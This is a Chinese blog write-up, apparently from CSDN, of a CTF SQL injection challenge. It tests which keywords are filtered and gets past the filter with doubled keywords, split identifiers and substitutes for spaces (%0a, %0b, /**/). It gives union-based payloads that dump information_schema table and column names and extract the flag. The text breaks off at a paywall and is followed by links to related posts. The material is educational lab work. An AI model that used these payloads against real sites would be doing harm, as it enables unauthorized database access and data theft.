实验吧——SQL注入 Write up(一)

最新推荐文章于 2022-09-19 13:33:28 发布
最新推荐文章于 2022-09-19 13:33:28 发布
阅读量472 收藏
点赞数 1
分类专栏: SQL
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43431158/article/details/98356255
版权

前言:之前学习过了联合注入查询、布尔盲注、时间盲注等,这次就通过SQL注入题来加强一下。

简单的sql注入

方法一
在这里插入图片描述
输入有回显,且有输入框,那就可以用联合查询的方法来注入

题中提示已经过滤了一些关键字,那么就先来查看题中过滤的是哪些关键字

?id=1 union select order by #

回显结果:
在这里插入图片描述
unionselect等都被过滤而且没有报错说明#也被过滤
可以自己建立一个语句来验证一下
在这里插入图片描述
如果#没有被过滤,那么上面的语句将会变成这样,语句一定会报错
在这里插入图片描述
题中将关键字过滤,可以尝试一下双写绕过的方法是否可用
输入框中输入?id=1 unionunion selectselect,发现空格也被过滤了
在这里插入图片描述
但双写绕过的方法是可行的,可以采用这个方法

判断注入点
可以采用'='1' or '1'='1查看是否有注入点
SQL注入——注入点判断

判断闭合符号

发现输入框中输入1'时语句报错,由于这道题将注释符号给过滤了,那就用'闭合后面的单引号,这样来测试是否'为闭合符号,可以自己建立sql语句来更详细的了解一下
在这里插入图片描述
在输入框中输入1 ' ',发现回显正常,说明'即为闭合符号
在这里插入图片描述
接下来就是联合注入的一系列步骤了

判断列数

当判断是否有注入点的时候,发现
在这里插入图片描述
只有name,而我们输入的ID则一直不变,因此猜测列数只有一列

查询数据表

题中已经将注释符给过滤掉了,但是在上面已经知道了'是闭合符号,那就可以用and '1'='1来闭合后面的单引号

?id=1' union select group_concat(table_name) from information_schema.tables where table_schema=database() and '1'='1

在这里插入图片描述
其他都被过滤了,构造双写绕过,前面也说了空格也被过滤了,但是也可以用两个空格来绕过过滤

输入

?id=1' unionunion  selectselect  group_concatgroup_concat(table_name)  fromfrom   information_schema.tables  wherewhere table_schematable_schema=database() andand  '1'='1

发现table_schematable_schema被强制换掉了,那么就用table_schemtable_schemaa这种形式来绕过,过滤中间的,前后再拼接成table_schematable_schema

payload:

?id=1' unionunion  selectselect  group_concatgroup_concat(table_name)  fromfrom   information_schema.tables  wherewhere  table_schemtable_schemaa=database()  andand  '1'='1

在这里插入图片描述
有一个表名为flag,flag应该就在里面

查字段

payload:

?id=1'unionunion  selectselect  group_concatgroup_concat(column_namcolumn_namee)  fromfrom  information_schema.columinformation_schema.columnsns  wherewhere  table_name='flag

这里column_name也采用错位的方法来绕过,但估计是系统原因吧,莫名奇妙崩了
在这里插入图片描述
看了其他大师傅的博客,知道flag是其中的一个字段,就构造语句查询结果

查值

payload:

?id=1'unionunion  selectselect  flag  fromfrom  flag  wherewhere  '1'='1

在这里插入图片描述
得出结果

方法二

一道题肯定是不只一种解法的,再来看看另一种方法
输入

?id=1 unionunion and selectselect

发现回显
在这里插入图片描述
很奇怪,如果是过滤关键字了,为什么还有关键字,尝试几次就会发现关键字过滤实际上是过滤后面带有一个空格的关键字,那就又出现了一个思路,只需将空格绕过即可

常见的空格绕过有这些

+%0a、%0b、/**/

查询数据库

?id=1' union/**/select/**/database()'

?id=1' union%0aselect%0adatabase()'

?id=1' union%0bselect%0bdatabase()'
最低0.47元/天 解锁文章
lemonl1
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
啊D——SQL注入工具
12-01
啊D注入工具
实验吧-简单的sql注入3 Writeup
baynk的博客
07-29 340
继续继续 过程 输入1,然后发现只有一个hello。。。好吧,肯定得盲注了,先试试闭合吧,果然还是单引号的,但是居然有报错信息,应该也可以使用报错注入吧。 然后再尝试干掉单引号的时候意外发现#居然可以用了,这真是省了不少事。。 想来想去还是使用报错注入,盲注还是交给sqlmap来解决吧。先来搞库名,用的floor(),结果来这么一出。 don't到底是个啥,又换了两种其他的报错,updatexm...
实验吧-简单的登录题——WriteUp再研究
LeeHDsniper的博客
07-17 6151
前言 这个题目的难点就是在于对于CBC加密方式尤其是解密这部分要琢磨一番,让我想起当年大学的时候信安三勇中的两勇的课,一门密码学,一门数学基础,可怕之极。这个题网上writeup一大堆,但是在一些方面解释的不是很详细,对大神们已经说的很清楚的地方我就粗略带过。 CBC解密以及字节翻转攻击(cbc-byte-flipping-attack) 我主要以CBC字符翻转 原理与实战这篇文章为基础...
简单的sql注入-实验Writeup
KRDecad3的博客
11-08 522
简单的sql注入-实验Writeup 看了网上很多Writeup,对过滤的解释有好几种,看的很迷糊,因此就自己实践实践,写下来整理一下思路。 题目链接 输入1,返回查询的ID和name: 然后输入1' 报错: 由此可知,存在字符型注入。 输入1' and 1=1--+,也会报错: 那么这里首先可以看到过滤掉了注释符, 不去闭合单引号:1 and 1=1 可以看到过滤掉了and和注释符。 ...
“百度杯”CTF比赛 十月场 writeup
weixin_45871855的博客
08-30 1216
分值:10分 类型:Misc题目名称:考眼力未解答 题目内容: gmbh{4d850d5c3c2756f67b91cbe8f046eebd} try to find the flag
sql注入之万能密码漏洞复现(附源码)
qq_40390383的博客
04-11 1971
<html> <head> <meta charset="utf-8"> <title>sql注入靶机</title> </head> <body> <form action="sql.php" method="GET"> username:<input type="text" name="u...
打造网站的坚盾——SQL注入防范专题——SQL注入防范之完善网站程序.pdf
09-19
打造网站的坚盾——SQL注入防范专题——SQL注入防范之完善网站程序.pdf
PHP——SQL注入测试靶场
05-27
【PHP——SQL注入测试靶场】是一个用于学习和实践SQL注入漏洞的安全平台,它通过PHP编程语言构建,目的是帮助开发者和网络安全爱好者理解SQL注入的工作原理,以及如何防范这种常见的Web安全威胁。SQL注入是一种攻击...
SQL注入——mssql注入
01-19
可以在 SQL Server 中执行任何活动。 serveradmin  可以设置服务器范围的配置选项,关闭服务器。 setupadmin 可以管理链接服务器和启动过程,并执行某些系统存储过程(sp_...
实验2——SQL语言.doc
10-08
实验2——SQL语言 本实验主要是对SQL语言的应用和数据库设计的实践。通过实验,了解数据库的设计和SQL Server 2008中的数据类型,并掌握使用SQL语句创立和删除模式和索引、创立、修改和删除数据表、查询表中的数据...
SQL注入】CTF练习题WriteUp——“百度杯”CTF比赛 九月场SQL
Fighting_hawk的博客
05-17 3477
1. 本题关键在于关键字的绕过,需要耐心+细心,一个个尝试。 2. 同时在练习过程中多记录累积一些绕过的方法,比如这一道题的。
CTFHUB——SQL 报错注入三种方法全解
wuuconix's blog
08-25 2893
背景 Sql注入主要有三种方法,extractvalue和updatexml函数形成的xpath报错,这算两种。还有一种就是floor实现的group by主键重复,这算另外一种。 本篇文章将对CTFHUB中的SQL报错注入题目从头到尾对这三种方法进行实践。 利用extractvalue来xpath报错。 1 and (select extractvalue(1, concat(0x7e, (select database())))) 1 and (select extractvalue(1, conc
SQL注入原理深度解析
等着你的出现
02-18 265
对于Web应用来说,注射式攻击由来已久,攻击方式也五花八门,常见的攻击方式有SQL注射、命令注射以及新近才出现的XPath注射等等。本文将以SQL注射为例,在源码级对其攻击原理进行深入的讲解。 一、注射式攻击的原理注射式攻击的根源在于,程序命令和用户数据(即用户输入)之间没有做到泾渭分明。这使得攻击者有机会将程序命令当作用户输入的数据提交给Web程序,以发号施令,为所欲为。为了发动注射攻击,攻击者...
SQL注入漏洞详解
墨痕诉清风的博客
08-09 9347
" 预先编译好,也就是SQL引擎会预先进行语法分析,产生语法树,生成执行计划,也就是说,后面你输入的参数,无论你输入的是什么,都不会影响该SQL语句的语法结构了,因为语法分析已经完成了,而语法分析主要是分析SQL命令,比如 select、from 、where 、and、 or 、order by 等等。在这里,我们使用了占位符的方式,将该SQL传入prepare函数后,预处理函数就会得到本次查询语句的SQL模板类,并将这个模板类返回,模板可以防止传那些危险变量改变本身查询语句的语义。
万字sql注入学习过程--------从一个查询语句到SQL注入原理——包含各种注入姿势及相关CTF,靶场,漏洞实战 随时补充内容
AAAAAAAAAAAA66的博客
11-30 2602
从第一次接触到SQL注入到现在已经有小半年了,简单打了个DVWA靶场之后便没怎么用手工注入,非常依赖工具,最近遇到几道需要手动注入的CTF题目,发现自己对sql注入的原理只是停留在一个基础的理论之上,所以就写这一篇文章对自己的sql注入进行新的梳理。 ——————————————————————————————————————————— 开始介绍sql注入漏洞之前,先介绍一个基础的mysql查询语句(学过数据库的同学直接跳走) 我们经常遇到一个这样的需要我们输入的表格 我们在这输入一个 1 .
【CTF bugku 成绩查询】关于sql注入
zw05011的博客
01-17 632
知识点 sql注入基础原理(超详细) - 简书一、Sql注入简介 Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最...https://www.jianshu.com/p/078df7a35671通过1和1'查看返回值,确定注入 通过1' order by 1#、1' order by 2#直到确定为几列 通过联合查询 1' union select database(),user()#进行查询
SQL注入漏洞测试实战
weixin_47493074的博客
09-19 570
sqlmap小测试
mysql注入万能密码_Natas14 Writeup(sql注入、sql万能密码)
weixin_39861255的博客
02-07 214
Natas14:是一个登录页面。源码如下。if(array_key_exists("username", $_REQUEST)) {$link = mysql_connect('localhost', 'natas14', '');mysql_select_db('natas14', $link);$query = "SELECT * from users where username=\"".$...
【SQL】SQL注入漏洞及相关实验(更新中)精华!不看就亏了!
weixin_45844670的博客
08-26 1549
SQL注入原理:SQL注入的原理其实并不难理解,Web应用程序后台获取用户输入并将其拼接到SQL查询语句中进行执行,而这里的用户输入就是我们可以构造恶意payload的地方,通过一些技巧使得查询语句按照我们所希望的方式执行即可完成一次成功的SQL注入。正如大多数的Web漏洞一样,究其漏洞本质就是未验证用户输入,没有实现输入数据与程序执行语句的分离。 但是由于存在不同的数据库(如常见的Oracle、SQL Server、Mysql等)所导致的具有微小差异性的SQL语句实现,以及我们无法直接观察到后台的查询逻辑
sqli-labs实验指导手册
最新发布
11-17
"sqli-labs实验指导手册详细介绍了如何通过搭建sqli-labs实验平台来学习和实践SQL注入攻击及防御。本实验手册主要针对基于单引号的字符型联合注入进行深入解析,帮助读者理解SQL注入的原理,并提供逐步解密数据库...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值